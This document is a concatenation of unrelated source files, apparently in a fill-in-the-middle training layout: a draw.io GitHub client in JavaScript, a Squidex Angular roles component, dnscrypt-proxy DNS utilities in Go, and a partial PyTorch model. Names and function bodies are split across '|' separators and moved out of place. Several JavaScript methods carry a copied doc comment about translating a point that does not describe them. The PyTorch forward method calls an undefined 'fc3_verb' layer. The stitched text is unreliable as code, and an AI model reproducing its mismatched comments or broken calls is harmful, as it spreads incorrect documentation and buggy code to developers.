if (xml != null && xml.length > 0)
{
content = xml;
}
else
{
content = 'data:image/png;base64,' + content;
}
}
else
{
content = Base64.decode(content);
}
}
}
return (asLibrary) ? new GitHubLibrary(this.ui, content, meta) : new GitHubFile(this.ui, content, meta);
};
/**
* Translates this point by the given vector.
*
* @param {number} dx X-coordinate of the translation.
* @param {number} dy Y-coordinate of the translation.
*/
GitHubClient.prototype.insertLibrary = function(filename, data, success, error, folderId)
{
this.insertFile(filename, data, success, error, true, folderId, false);
};
/**
* Translates this point by the given vector.
*
* @param {number} dx X-coordinate of the translation.
* @param {number} dy Y-coordinate of the translation.
*/
GitHubClient.prototype.insertFile = function(filename, data, success, error, asLibrary, folderId, base64Encoded)
{
asLibrary = (asLibrary != null) ? asLibrary : false;
var tokens = folderId.split('/');
var org = tokens[0];
var repo = tokens[1];
var ref = tokens[2];
var path = tokens.slice(3, tokens.length).join('/');
if (path.length > 0)
{
path = path + '/';
}
path = path + filename;
this.checkExists(org + '/' + repo + '/' + ref + '/' + path, true, mxUtils.bind(this, function(checked, sha)
{
if (checked)
{
// Does not insert file here as there is another writeFile implicit via fileCreated
if (!asLibrary)
{
success(new GitHubFile(this.ui, data, {'org': org, 'repo': repo, 'ref': ref,
'name': filename, 'path': path, 'sha': sha, isNew: true}));
}
else
{
if (!base64Encoded)
{
data = Base64.encode(data);
}
this.showCommitDialog(filename, true, mxUtils.bind(this, function(message)
{
this.writeFile(org, repo, ref, path, message, data, sha, mxUtils.bind(this, function(req)
{
try
{
var msg = JSON.parse(req.getText());
success(this.createGitHubFile(org, repo, ref, msg.content, asLibrary));
}
catch (e)
{
error(e);
}
}), error);
}), error);
}
}
else
{
error();
}
}))
};
/**
*
*/
GitHubClient.prototype.showCommitDialog = function(filename, isNew, success, cancel)
{
// Pauses spinner while commit message dialog is shown
var resume = this.ui.spinner.pause();
var dlg = new FilenameDialog(this.ui, mxResources.get((isNew) ? 'addedFile' : 'updateFile',
[filename]), mxResources.get('ok'), mxUtils.bind(this, function(message)
{
resume();
success(message);
}), mxResources.get('commitMessage'), null, null, null, null, mxUtils.bind(this, function()
{
cancel();
}), null, 280);
this.ui.showDialog(dlg.container, 400, 80, true, false);
dlg.init();
};
/**
*
*/
GitHubClient.prototype.writeFile = function(org, repo, ref, path, message, data, sha, success, error)
{
if (data.length >= this.maxFileSize)
{
error({message: mxResources.get('drawingTooLarge') + ' (' +
this.ui.formatFileSize(data.length) + ' / 1 MB)'});
}
else
{
var entity =
{
path: path,
branch: decodeURIComponent(ref),
message: message,
content: data
};
if (sha != null)
{
entity.sha = sha;
}
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/contents/' + path, JSON.stringify(entity), 'PUT');
this.executeRequest(req, mxUtils.bind(this, function(req)
{
success(req);
}), mxUtils.bind(this, function(err)
{
if (err.code == 404)
{
err.helpLink = 'https://github.com/settings/connections/applications/' + this.clientId;
err.code = null;
}
error(err);
}));
}
};
/**
* Translates this point by the given vector.
*
* @param {number} dx X-coordinate of the translation.
* @param {number} dy Y-coordinate of the translation.
*/
GitHubClient.prototype.checkExists = function(path, askReplace, fn)
{
var tokens = path.split('/');
var org = tokens[0];
var repo = tokens[1];
var ref = tokens[2];
path = tokens.slice(3, tokens.length).join('/');
this.getSha(org, repo, path, ref, mxUtils.bind(this, function(sha)
{
if (askReplace)
{
var resume = this.ui.spinner.pause();
this.ui.confirm(mxResources.get('replaceIt', [path]), function()
{
resume();
fn(true, sha);
}, function()
{
resume();
fn(false);
});
}
else
{
this.ui.spinner.stop();
this.ui.showError(mxResources.get('error'), mxResources.get('fileExists'), mxResources.get('ok'), function()
{
fn(false);
});
}
}), mxUtils.bind(this, function(err)
{
fn(true);
}), null, true);
};
/**
* Translates this point by the given vector.
*
* @param {number} dx X-coordinate of the translation.
* @param {number} dy Y-coordinate of the translation.
*/
GitHubClient.prototype.saveFile = function(file, success, error, overwrite, message)
{
var org = file.meta.org;
var repo = file.meta.repo;
var ref = file.meta.ref;
var path = file.meta.path;
var fn = mxUtils.bind(this, function(sha, data)
{
this.writeFile(org, repo, ref, path, message, data, sha,
mxUtils.bind(this, function(req)
{
delete file.meta.isNew;
success(JSON.parse(req.getText()).content.sha);
}), mxUtils.bind(this, function(err)
{
error(err);
}));
});
var fn2 = mxUtils.bind(this, function()
{
if (this.ui.useCanvasForExport && /(\.png)$/i.test(path))
{
this.ui.getEmbeddedPng(mxUtils.bind(this, function(data)
{
fn(file.meta.sha, data);
}), error, (this.ui.getCurrentFile() != file) ? file.getData() : null);
}
else
{
fn(file.meta.sha, Base64.encode(file.getData()));
}
});
if (overwrite)
{
this.getSha(org, repo, path, ref, mxUtils.bind(this, function(sha)
{
file.meta.sha = sha;
fn2();
}), error);
}
else
{
fn2();
}
};
/**
* Checks if the client is authorized and calls the next step.
*/
GitHubClient.prototype.pickLibrary = function(fn)
{
this.pickFile(fn);
};
/**
* Checks if the client is authorized and calls the next step.
*/
GitHubClient.prototype.pickFolder = function(fn)
{
this.showGitHubDialog(false, fn);
};
/**
* Checks if the client is authorized and calls the next step.
*/
GitHubClient.prototype.pickFile = function(fn)
{
fn = (fn != null) ? fn : mxUtils.bind(this, function(path)
{
this.ui.loadFile('H' + encodeURIComponent(path));
});
this.showGitHubDialog(true, fn);
};
/**
*
*/
GitHubClient.prototype.showGitHubDialog = function(showFiles, fn)
{
var org = null;
var repo = null;
var ref = null;
var path = null;
var content = document.createElement('div');
content.style.whiteSpace = 'nowrap';
content.style.overflow = 'hidden';
content.style.height = '304px';
var hd = document.createElement('h3');
mxUtils.write(hd, mxResources.get((showFiles) ? 'selectFile' : 'selectFolder'));
hd.style.cssText = 'width:100%;text-align:center;margin-top:0px;margin-bottom:12px';
content.appendChild(hd);
var div = document.createElement('div');
div.style.whiteSpace = 'nowrap';
div.style.border = '1px solid lightgray';
div.style.boxSizing = 'border-box';
div.style.padding = '4px';
div.style.overflow = 'auto';
div.style.lineHeight = '1.2em';
div.style.height = '274px';
content.appendChild(div);
var listItem = document.createElement('div');
listItem.style.textOverflow = 'ellipsis';
listItem.style.boxSizing = 'border-box';
listItem.style.overflow = 'hidden';
listItem.style.padding = '4px';
listItem.style.width = '100%';
var dlg = new CustomDialog(this.ui, content, mxUtils.bind(this, function()
{
fn(org + '/' + repo + '/' + encodeURIComponent(ref) + '/' + path);
}));
this.ui.showDialog(dlg.container, 420, 360, true, true);
if (showFiles)
{
dlg.okButton.parentNode.removeChild(dlg.okButton);
}
var createLink = mxUtils.bind(this, function(label, fn, padding)
{
var link = document.createElement('a');
link.setAttribute('href', 'javascript:void(0);');
link.setAttribute('title', label);
mxUtils.write(link, label);
mxEvent.addListener(link, 'click', fn);
if (padding != null)
{
var temp = listItem.cloneNode();
temp.style.padding = padding;
temp.appendChild(link);
link = temp;
}
return link;
});
var updatePathInfo = mxUtils.bind(this, function(hideRef)
{
var pathInfo = document.createElement('div');
pathInfo.style.marginBottom = '8px';
pathInfo.appendChild(createLink(org + '/' + repo, mxUtils.bind(this, function()
{
path = null;
selectRepo();
})));
if (!hideRef)
{
mxUtils.write(pathInfo, ' / ');
pathInfo.appendChild(createLink(decodeURIComponent(ref), mxUtils.bind(this, function()
{
path = null;
selectRef();
})));
}
if (path != null && path.length > 0)
{
var tokens = path.split('/');
for (var i = 0; i < tokens.length; i++)
{
(function(index)
{
mxUtils.write(pathInfo, ' / ');
pathInfo.appendChild(createLink(tokens[index], mxUtils.bind(this, function()
{
path = tokens.slice(0, index + 1).join('/');
selectFile();
})));
})(i);
}
}
div.appendChild(pathInfo);
});
var error = mxUtils.bind(this, function(err)
{
this.ui.handleError(err, null, mxUtils.bind(this, function()
{
this.ui.spinner.stop();
if (this.getUser() != null)
{
org = null;
repo = null;
ref = null;
path = null;
selectRepo();
}
else
{
this.ui.hideDialog();
}
| });
// Adds paging for repos, branches and files (files limited to 1000 by API)
var nextPageDiv = null;
var scrollFn = null;
var pageSize = 100;
var selectFile = mxUtils.bind(this, function(page)
{
if (page == null)
{
div.innerHTML = '';
page = 1;
}
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/contents/' + path + '?ref=' + encodeURIComponent(ref) +
'&per_page=' + pageSize + '&page=' + page, null, 'GET');
this.ui.spinner.spin(div, mxResources.get('loading'));
dlg.okButton.removeAttribute('disabled');
if (scrollFn != null)
{
mxEvent.removeListener(div, 'scroll', scrollFn);
scrollFn = null;
}
if (nextPageDiv != null && nextPageDiv.parentNode != null)
{
nextPageDiv.parentNode.removeChild(nextPageDiv);
}
nextPageDiv = document.createElement('a');
nextPageDiv.style.display = 'block';
nextPageDiv.setAttribute('href', 'javascript:void(0);');
mxUtils.write(nextPageDiv, mxResources.get('more') + '...');
var nextPage = mxUtils.bind(this, function()
{
selectFile(page + 1);
});
mxEvent.addListener(nextPageDiv, 'click', nextPage);
this.executeRequest(req, mxUtils.bind(this, function(req)
{
this.ui.spinner.stop();
if (page == 1)
{
updatePathInfo();
div.appendChild(createLink('../ [Up]', mxUtils.bind(this, function()
{
if (path == '')
{
path = null;
selectRepo();
}
else
{
var tokens = path.split('/');
path = tokens.slice(0, tokens.length - 1).join('/');
selectFile();
}
}), '4px'));
}
var files = JSON.parse(req.getText());
if (files == null || files.length == 0)
{
mxUtils.write(div, mxResources.get('noFiles'));
}
else
{
var gray = true;
var count = 0;
var listFiles = mxUtils.bind(this, function(showFolders)
{
for (var i = 0; i < files.length; i++)
{
(mxUtils.bind(this, function(file, idx)
{
if (showFolders == (file.type == 'dir'))
{
var temp = listItem.cloneNode();
temp.style.backgroundColor = (gray) ? '#eeeeee' : '';
gray = !gray;
var typeImg = document.createElement('img');
typeImg.src = IMAGE_PATH + '/' + (file.type == 'dir'? 'folder.png' : 'file.png');
typeImg.setAttribute('align', 'absmiddle');
typeImg.style.marginRight = '4px';
typeImg.style.marginTop = '-4px';
typeImg.width = 20;
temp.appendChild(typeImg);
temp.appendChild(createLink(file.name + ((file.type == 'dir') ? '/' : ''), mxUtils.bind(this, function()
{
if (file.type == 'dir')
{
path = file.path;
selectFile();
}
else if (showFiles && file.type == 'file')
{
this.ui.hideDialog();
fn(org + '/' + repo + '/' + encodeURIComponent(ref) + '/' + file.path);
}
})));
div.appendChild(temp);
count++;
}
}))(files[i], i);
}
});
listFiles(true);
if (showFiles)
{
listFiles(false);
}
// LATER: Paging not supported for contents in GitHub
// if (count == pageSize)
// {
// div.appendChild(nextPageDiv);
//
// scrollFn = function()
// {
// if (div.scrollTop >= div.scrollHeight - div.offsetHeight)
// {
// nextPage();
// }
// };
//
// mxEvent.addListener(div, 'scroll', scrollFn);
// }
}
}), error, true);
});
var selectRef = mxUtils.bind(this, function(page)
{
if (page == null)
{
div.innerHTML = '';
page = 1;
}
var req = new mxXmlRequest(this.baseUrl + '/repos/' + org + '/' + repo +
'/branches?per_page=' + pageSize + '&page=' + page, null, 'GET');
dlg.okButton.setAttribute('disabled', 'disabled');
this.ui.spinner.spin(div, mxResources.get('loading'));
if (scrollFn != null)
{
mxEvent.removeListener(div, 'scroll', scrollFn);
scrollFn = null;
}
if (nextPageDiv != null && nextPageDiv.parentNode != null)
{
nextPageDiv.parentNode.removeChild(nextPageDiv);
}
nextPageDiv = document.createElement('a');
nextPageDiv.style.display = 'block';
nextPageDiv.setAttribute('href', 'javascript:void(0);');
mxUtils.write(nextPageDiv, mxResources.get('more') + '...');
var nextPage = mxUtils.bind(this, function()
{
selectRef(page + 1);
});
mxEvent.addListener(nextPageDiv, 'click', nextPage);
this.executeRequest(req, mxUtils.bind(this, function(req)
{
this.ui.spinner.stop();
if (page == 1)
{
updatePathInfo(true);
div.appendChild(createLink('../ [Up]', mxUtils.bind(this, function()
{
path = null;
selectRepo();
}), '4px'));
}
var branches = JSON.parse(req.getText());
if (branches == null || branches.length == 0)
{
mxUtils.write(div, mxResources.get('noFiles'));
}
else
{
for (var i = 0; i < branches.length; i++)
{
(mxUtils.bind(this, function(branch, idx)
{
var temp = listItem.cloneNode();
temp.style.backgroundColor = (idx % 2 == 0) ? '#eeeeee' : '';
temp.appendChild(createLink(branch.name, mxUtils.bind(this, function()
{
ref = branch.name;
path = '';
selectFile();
})));
div.appendChild(temp);
}))(branches[i], i);
}
if (branches.length == pageSize)
{
div.appendChild(nextPageDiv);
scrollFn = function()
{
if (div.scrollTop >= div.scrollHeight - div.offsetHeight)
{
nextPage();
}
};
mxEvent.addListener(div, 'scroll', scrollFn);
}
}
}), error);
});
var selectRepo = mxUtils.bind(this, function(page)
{
if (page == null)
{
div.innerHTML = '';
page = 1;
}
var req = new mxXmlRequest(this.baseUrl + '/user/repos?per_page=' +
pageSize + '&page=' + page, null, 'GET');
dlg.okButton.setAttribute('disabled', 'disabled');
this.ui.spinner.spin(div, mxResources.get('loading'));
if (scrollFn != null)
{
mxEvent.removeListener(div, 'scroll', scrollFn);
}
if (nextPageDiv != null && nextPageDiv.parentNode != null)
{
nextPageDiv.parentNode.removeChild(nextPageDiv);
}
nextPageDiv = document.createElement('a');
nextPageDiv.style.display = 'block';
nextPageDiv.setAttribute('href', 'javascript:void(0);');
mxUtils.write(nextPageDiv, mxResources.get('more') + '...');
var nextPage = mxUtils.bind(this, function()
{
selectRepo(page + 1);
});
mxEvent.addListener(nextPageDiv, 'click', nextPage);
this.executeRequest(req, mxUtils.bind(this, function(req)
{
this.ui.spinner.stop();
var repos = JSON.parse(req.getText());
if (repos == null || repos.length == 0)
{
mxUtils.write(div, mxResources.get('noFiles'));
}
else
{
if (page == 1)
{
div.appendChild(createLink(mxResources.get('enterValue') + '...', mxUtils.bind(this, function()
{
var dlg = new FilenameDialog(this.ui, 'org/repo/ref', mxResources.get('ok'), mxUtils.bind(this, function(value)
{
if (value != null)
{
var tokens = value.split('/');
if (tokens.length > 1)
{
var tmpOrg = tokens[0];
var tmpRepo = tokens[1];
if (tokens.length < 3)
{
org = tmpOrg;
repo = tmpRepo;
ref = null;
path = null;
selectRef();
}
else if (this.ui.spinner.spin(div, mxResources.get('loading')))
{
var tmpRef = encodeURIComponent(tokens.slice(2, tokens.length).join('/'));
this.getFile(tmpOrg + '/' + tmpRepo + '/' + tmpRef, mxUtils.bind(this, function(file)
{
this.ui.spinner.stop();
org = file.meta.org;
repo = file.meta.repo;
ref = decodeURIComponent(file.meta.ref);
path = '';
selectFile();
}), mxUtils.bind(this, function(err)
{
this.ui.spinner.stop();
this.ui.handleError({message: mxResources.get('fileNotFound')});
}));
}
}
else
{
this.ui.spinner.stop();
this.ui.handleError({message: mxResources.get('invalidName')});
}
}
}), mxResources.get('enterValue'));
this.ui.showDialog(dlg.container, 300, 80, true, false);
dlg.init();
})));
mxUtils.br(div);
mxUtils.br(div);
}
for (var i = 0; i < repos.length; i++)
{
(mxUtils.bind(this, function(repository, idx)
{
var temp = listItem.cloneNode();
temp.style.backgroundColor = (idx % 2 == 0) ? '#eeeeee' : '';
temp.appendChild(createLink(repository.full_name, mxUtils.bind(this, function()
{
org = repository.owner.login;
repo = repository.name;
ref = repository.default_branch;
path = '';
selectFile();
})));
div.appendChild(temp);
}))(repos[i], i);
}
}
if (repos.length == pageSize)
{
div.appendChild(nextPageDiv);
scrollFn = function()
{
if (div.scrollTop >= div.scrollHeight - div.offsetHeight)
{
nextPage();
}
};
mxEvent.addListener(div, 'scroll', scrollFn);
}
}), error);
});
selectRepo();
};
/**
* Checks if the client is authorized and calls the next step.
*/
GitHubClient.prototype.logout = function()
{
this.clearPersistentToken();
this.setUser(null);
this.token = null;
}; | }));
|
roles-page.component.ts | /*
* Squidex Headless CMS
*
* @license
* Copyright (c) Squidex UG (haftungsbeschränkt). All rights reserved.
*/
import { Component, OnInit } from '@angular/core';
import { FormBuilder } from '@angular/forms';
import { Observable, of } from 'rxjs';
import {
AddRoleForm,
AppsState,
AutocompleteSource,
RoleDto,
RolesService,
RolesState
} from '@app/shared';
class PermissionsAutocomplete implements AutocompleteSource {
private permissions: string[] = [];
constructor(appsState: AppsState, rolesService: RolesService) {
rolesService.getPermissions(appsState.appName).subscribe(x => this.permissions = x);
}
public find(query: string): Observable<any[]> {
return of(this.permissions.filter(y => y.indexOf(query) === 0));
}
}
@Component({
selector: 'sqx-roles-page',
styleUrls: ['./roles-page.component.scss'],
templateUrl: './roles-page.component.html'
})
export class R | implements OnInit {
public addRoleForm = new AddRoleForm(this.formBuilder);
public allPermissions: AutocompleteSource = new PermissionsAutocomplete(this.appsState, this.rolesService);
constructor(
public readonly appsState: AppsState,
public readonly rolesService: RolesService,
public readonly rolesState: RolesState,
private readonly formBuilder: FormBuilder
) {
}
public ngOnInit() {
this.rolesState.load();
}
public reload() {
this.rolesState.load(true);
}
public cancelAddRole() {
this.addRoleForm.submitCompleted();
}
public addRole() {
const value = this.addRoleForm.submit();
if (value) {
this.rolesState.add(value)
.subscribe(() => {
this.addRoleForm.submitCompleted();
}, error => {
this.addRoleForm.submitFailed(error);
});
}
}
public trackByRole(index: number, role: RoleDto) {
return role.name;
}
}
| olesPageComponent |
dnsutils.go | package main
import (
"encoding/binary"
"errors"
"net"
"strings"
"time"
"unicode/utf8"
"github.com/jedisct1/dlog"
"github.com/miekg/dns"
)
func EmptyResponseFromMessage(srcMsg *dns.Msg) *dns.Msg {
dstMsg := dns.Msg{MsgHdr: srcMsg.MsgHdr, Compress: true}
dstMsg.Question = srcMsg.Question
dstMsg.Response = true
if srcMsg.RecursionDesired {
dstMsg.RecursionAvailable = true
}
dstMsg.RecursionDesired = false
dstMsg.CheckingDisabled = false
dstMsg.AuthenticatedData = false
if edns0 := srcMsg.IsEdns0(); edns0 != nil {
dstMsg.SetEdns0(edns0.UDPSize(), edns0.Do())
}
return &dstMsg
}
func TruncatedResponse(packet []byte) ([]byte, error) {
srcMsg := dns.Msg{}
if err := srcMsg.Unpack(packet); err != nil {
return nil, err
}
dstMsg := EmptyResponseFromMessage(&srcMsg)
dstMsg.Truncated = true
return dstMsg.Pack()
}
func RefusedResponseFromMessage(srcMsg *dns.Msg, refusedCode bool, ipv4 net.IP, ipv6 net.IP, ttl uint32) *dns.Msg {
dstMsg := EmptyResponseFromMessage(srcMsg)
if refusedCode {
dstMsg.Rcode = dns.RcodeRefused
} else {
dstMsg.Rcode = dns.RcodeSuccess
questions := srcMsg.Question
if len(questions) == 0 {
return dstMsg
}
question := questions[0]
sendHInfoResponse := true
if ipv4 != nil && question.Qtype == dns.TypeA {
rr := new(dns.A)
rr.Hdr = dns.RR_Header{Name: question.Name, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: ttl}
rr.A = ipv4.To4()
if rr.A != nil {
dstMsg.Answer = []dns.RR{rr}
sendHInfoResponse = false
}
} else if ipv6 != nil && question.Qtype == dns.TypeAAAA {
rr := new(dns.AAAA)
rr.Hdr = dns.RR_Header{Name: question.Name, Rrtype: dns.TypeAAAA, Class: dns.ClassINET, Ttl: ttl}
rr.AAAA = ipv6.To16()
if rr.AAAA != nil {
dstMsg.Answer = []dns.RR{rr}
sendHInfoResponse = false
}
}
if sendHInfoResponse {
hinfo := new(dns.HINFO)
hinfo.Hdr = dns.RR_Header{Name: question.Name, Rrtype: dns.TypeHINFO,
Class: dns.ClassINET, Ttl: ttl}
hinfo.Cpu = "This query has been locally blocked"
hinfo.Os = "by dnscrypt-proxy"
dstMsg.Answer = []dns.RR{hinfo}
}
}
return dstMsg
}
func HasTCFlag(packet []byte) bool |
func TransactionID(packet []byte) uint16 {
return binary.BigEndian.Uint16(packet[0:2])
}
func SetTransactionID(packet []byte, tid uint16) {
binary.BigEndian.PutUint16(packet[0:2], tid)
}
func Rcode(packet []byte) uint8 {
return packet[3] & 0xf
}
func NormalizeRawQName(name *[]byte) {
for i, c := range *name {
if c >= 65 && c <= 90 {
(*name)[i] = c + 32
}
}
}
func NormalizeQName(str string) (string, error) {
if len(str) == 0 || str == "." {
return ".", nil
}
hasUpper := false
str = strings.TrimSuffix(str, ".")
strLen := len(str)
for i := 0; i < strLen; i++ {
c := str[i]
if c >= utf8.RuneSelf {
return str, errors.New("Query name is not an ASCII string")
}
hasUpper = hasUpper || ('A' <= c && c <= 'Z')
}
if !hasUpper {
return str, nil
}
var b strings.Builder
b.Grow(len(str))
for i := 0; i < strLen; i++ {
c := str[i]
if 'A' <= c && c <= 'Z' {
c += 'a' - 'A'
}
b.WriteByte(c)
}
return b.String(), nil
}
func getMinTTL(msg *dns.Msg, minTTL uint32, maxTTL uint32, cacheNegMinTTL uint32, cacheNegMaxTTL uint32) time.Duration {
if (msg.Rcode != dns.RcodeSuccess && msg.Rcode != dns.RcodeNameError) || (len(msg.Answer) <= 0 && len(msg.Ns) <= 0) {
return time.Duration(cacheNegMinTTL) * time.Second
}
var ttl uint32
if msg.Rcode == dns.RcodeSuccess {
ttl = uint32(maxTTL)
} else {
ttl = uint32(cacheNegMaxTTL)
}
if len(msg.Answer) > 0 {
for _, rr := range msg.Answer {
if rr.Header().Ttl < ttl {
ttl = rr.Header().Ttl
}
}
} else {
for _, rr := range msg.Ns {
if rr.Header().Ttl < ttl {
ttl = rr.Header().Ttl
}
}
}
if msg.Rcode == dns.RcodeSuccess {
if ttl < minTTL {
ttl = minTTL
}
} else {
if ttl < cacheNegMinTTL {
ttl = cacheNegMinTTL
}
}
return time.Duration(ttl) * time.Second
}
func setMaxTTL(msg *dns.Msg, ttl uint32) {
for _, rr := range msg.Answer {
if ttl < rr.Header().Ttl {
rr.Header().Ttl = ttl
}
}
for _, rr := range msg.Ns {
if ttl < rr.Header().Ttl {
rr.Header().Ttl = ttl
}
}
for _, rr := range msg.Extra {
header := rr.Header()
if header.Rrtype == dns.TypeOPT {
continue
}
if ttl < rr.Header().Ttl {
rr.Header().Ttl = ttl
}
}
}
func updateTTL(msg *dns.Msg, expiration time.Time) {
until := time.Until(expiration)
ttl := uint32(0)
if until > 0 {
ttl = uint32(until / time.Second)
if until-time.Duration(ttl)*time.Second >= time.Second/2 {
ttl += 1
}
}
for _, rr := range msg.Answer {
rr.Header().Ttl = ttl
}
for _, rr := range msg.Ns {
rr.Header().Ttl = ttl
}
for _, rr := range msg.Extra {
if rr.Header().Rrtype != dns.TypeOPT {
rr.Header().Ttl = ttl
}
}
}
func hasEDNS0Padding(packet []byte) (bool, error) {
msg := dns.Msg{}
if err := msg.Unpack(packet); err != nil {
return false, err
}
if edns0 := msg.IsEdns0(); edns0 != nil {
for _, option := range edns0.Option {
if option.Option() == dns.EDNS0PADDING {
return true, nil
}
}
}
return false, nil
}
func addEDNS0PaddingIfNoneFound(msg *dns.Msg, unpaddedPacket []byte, paddingLen int) ([]byte, error) {
edns0 := msg.IsEdns0()
if edns0 == nil {
msg.SetEdns0(uint16(MaxDNSPacketSize), false)
edns0 = msg.IsEdns0()
if edns0 == nil {
return unpaddedPacket, nil
}
}
for _, option := range edns0.Option {
if option.Option() == dns.EDNS0PADDING {
return unpaddedPacket, nil
}
}
ext := new(dns.EDNS0_PADDING)
padding := make([]byte, paddingLen)
for i := range padding {
padding[i] = 'X'
}
ext.Padding = padding[:paddingLen]
edns0.Option = append(edns0.Option, ext)
return msg.Pack()
}
func removeEDNS0Options(msg *dns.Msg) bool {
edns0 := msg.IsEdns0()
if edns0 == nil {
return false
}
edns0.Option = []dns.EDNS0{}
return true
}
func isDigit(b byte) bool { return b >= '0' && b <= '9' }
func dddToByte(s []byte) byte {
return byte((s[0]-'0')*100 + (s[1]-'0')*10 + (s[2] - '0'))
}
func PackTXTRR(s string) []byte {
bs := make([]byte, len(s))
msg := make([]byte, 0)
copy(bs, s)
for i := 0; i < len(bs); i++ {
if bs[i] == '\\' {
i++
if i == len(bs) {
break
}
if i+2 < len(bs) && isDigit(bs[i]) && isDigit(bs[i+1]) && isDigit(bs[i+2]) {
msg = append(msg, dddToByte(bs[i:]))
i += 2
} else if bs[i] == 't' {
msg = append(msg, '\t')
} else if bs[i] == 'r' {
msg = append(msg, '\r')
} else if bs[i] == 'n' {
msg = append(msg, '\n')
} else {
msg = append(msg, bs[i])
}
} else {
msg = append(msg, bs[i])
}
}
return msg
}
type DNSExchangeResponse struct {
response *dns.Msg
rtt time.Duration
priority int
fragmentsBlocked bool
err error
}
func DNSExchange(proxy *Proxy, proto string, query *dns.Msg, serverAddress string, relay *DNSCryptRelay, serverName *string, tryFragmentsSupport bool) (*dns.Msg, time.Duration, bool, error) {
for {
cancelChannel := make(chan struct{})
channel := make(chan DNSExchangeResponse)
var err error
options := 0
for tries := 0; tries < 3; tries++ {
if tryFragmentsSupport {
queryCopy := query.Copy()
queryCopy.Id += uint16(options)
go func(query *dns.Msg, delay time.Duration) {
option := _dnsExchange(proxy, proto, query, serverAddress, relay, 1500)
option.fragmentsBlocked = false
option.priority = 0
channel <- option
time.Sleep(delay)
select {
case <-cancelChannel:
return
default:
}
}(queryCopy, time.Duration(200*tries)*time.Millisecond)
options++
}
queryCopy := query.Copy()
queryCopy.Id += uint16(options)
go func(query *dns.Msg, delay time.Duration) {
option := _dnsExchange(proxy, proto, query, serverAddress, relay, 480)
option.fragmentsBlocked = true
option.priority = 1
channel <- option
time.Sleep(delay)
select {
case <-cancelChannel:
return
default:
}
}(queryCopy, time.Duration(250*tries)*time.Millisecond)
options++
}
var bestOption *DNSExchangeResponse
for i := 0; i < options; i++ {
if dnsExchangeResponse := <-channel; dnsExchangeResponse.err == nil {
if bestOption == nil || dnsExchangeResponse.priority < bestOption.priority ||
(dnsExchangeResponse.priority == bestOption.priority && dnsExchangeResponse.rtt < bestOption.rtt) {
bestOption = &dnsExchangeResponse
if bestOption.priority == 0 {
close(cancelChannel)
break
}
}
} else {
err = dnsExchangeResponse.err
}
}
if bestOption != nil {
if bestOption.fragmentsBlocked {
dlog.Debugf("[%v] public key retrieval succeeded but server is blocking fragments", *serverName)
} else {
dlog.Debugf("[%v] public key retrieval succeeded", *serverName)
}
return bestOption.response, bestOption.rtt, bestOption.fragmentsBlocked, nil
}
if relay == nil || !proxy.anonDirectCertFallback {
if err == nil {
err = errors.New("Unable to reach the server")
}
return nil, 0, false, err
}
dlog.Infof("Unable to get the public key for [%v] via relay [%v], retrying over a direct connection", *serverName, relay.RelayUDPAddr.IP)
relay = nil
}
}
func _dnsExchange(proxy *Proxy, proto string, query *dns.Msg, serverAddress string, relay *DNSCryptRelay, paddedLen int) DNSExchangeResponse {
var packet []byte
var rtt time.Duration
if proto == "udp" {
qNameLen, padding := len(query.Question[0].Name), 0
if qNameLen < paddedLen {
padding = paddedLen - qNameLen
}
if padding > 0 {
opt := new(dns.OPT)
opt.Hdr.Name = "."
ext := new(dns.EDNS0_PADDING)
ext.Padding = make([]byte, padding)
opt.Option = append(opt.Option, ext)
query.Extra = []dns.RR{opt}
}
binQuery, err := query.Pack()
if err != nil {
return DNSExchangeResponse{err: err}
}
udpAddr, err := net.ResolveUDPAddr("udp", serverAddress)
if err != nil {
return DNSExchangeResponse{err: err}
}
upstreamAddr := udpAddr
if relay != nil {
proxy.prepareForRelay(udpAddr.IP, udpAddr.Port, &binQuery)
upstreamAddr = relay.RelayUDPAddr
}
now := time.Now()
pc, err := net.DialUDP("udp", nil, upstreamAddr)
if err != nil {
return DNSExchangeResponse{err: err}
}
defer pc.Close()
if err := pc.SetDeadline(time.Now().Add(proxy.timeout)); err != nil {
return DNSExchangeResponse{err: err}
}
if _, err := pc.Write(binQuery); err != nil {
return DNSExchangeResponse{err: err}
}
packet = make([]byte, MaxDNSPacketSize)
length, err := pc.Read(packet)
if err != nil {
return DNSExchangeResponse{err: err}
}
rtt = time.Since(now)
packet = packet[:length]
} else {
binQuery, err := query.Pack()
if err != nil {
return DNSExchangeResponse{err: err}
}
tcpAddr, err := net.ResolveTCPAddr("tcp", serverAddress)
if err != nil {
return DNSExchangeResponse{err: err}
}
upstreamAddr := tcpAddr
if relay != nil {
proxy.prepareForRelay(tcpAddr.IP, tcpAddr.Port, &binQuery)
upstreamAddr = relay.RelayTCPAddr
}
now := time.Now()
var pc net.Conn
proxyDialer := proxy.xTransport.proxyDialer
if proxyDialer == nil {
pc, err = net.DialTCP("tcp", nil, upstreamAddr)
} else {
pc, err = (*proxyDialer).Dial("tcp", tcpAddr.String())
}
if err != nil {
return DNSExchangeResponse{err: err}
}
defer pc.Close()
if err := pc.SetDeadline(time.Now().Add(proxy.timeout)); err != nil {
return DNSExchangeResponse{err: err}
}
binQuery, err = PrefixWithSize(binQuery)
if err != nil {
return DNSExchangeResponse{err: err}
}
if _, err := pc.Write(binQuery); err != nil {
return DNSExchangeResponse{err: err}
}
packet, err = ReadPrefixed(&pc)
if err != nil {
return DNSExchangeResponse{err: err}
}
rtt = time.Since(now)
}
msg := dns.Msg{}
if err := msg.Unpack(packet); err != nil {
return DNSExchangeResponse{err: err}
}
return DNSExchangeResponse{response: &msg, rtt: rtt, err: nil}
}
| {
return packet[2]&2 == 2
} |
esvs.py | import torch as t
import torch.nn as nn
import torch.nn.functional as F
class MTRN(nn.Module):
def __init__(self, frame_count: int):
super().__init__()
self.frame_count = frame_count
self.fc1 = nn.Linear(256 * frame_count, 1024)
self.fc2 = nn.Linear(1024, 512)
self.fc3 = nn.Linear(512, 397)
def forward(self, x):
x = x.view(-1, 256 * self.frame_count)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3_verb(x)
return x
class V_MTRN(nn.Module):
def __init__(self, frame_count: int, hidden_layer_size: int, dropout_count: int, dropout_probability: int = 0.5):
super().__init__()
if dropout_probability < 0 or dropout_probability > 1:
raise ValueError(f'Probability needs to be between 0 and 1, was: {dropout_probability}')
self.frame_count = frame_count
self.dropout_count = dropout_count
self.fc1 = nn.Linear(256 * frame_count, hidden_layer_size)
self.dropout = nn.Dropout(p=dropout_probability)
